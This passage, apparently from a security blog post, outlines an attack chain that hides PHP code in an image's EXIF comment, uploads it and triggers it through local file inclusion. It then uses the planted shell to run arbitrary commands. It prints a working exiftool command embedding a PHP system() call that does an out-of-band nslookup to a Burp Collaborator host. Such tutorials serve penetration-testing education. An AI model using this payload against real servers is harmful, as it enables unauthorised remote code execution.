InfoSecAntara/theantaramane/_posts/2021-05-08-PHPObjectInjection.md

   1. Create an Image file with PHP code using exif or any other image utility tool
   2. Upoad the file and locate the path
   3. Utilize LFI include image file and make an Out of Band call to confirm the code execution
+  4. Make use of the shell uploaded and run arbitrary commands

 We will be using exif tool with the following command:

    "exiftool -Comment='<?php system("nslookup 4lqd7k2ulofzkiwzv0m5gf7qohu8ix.burpcollaborator.net"); ?>' beingsecure.jpeg"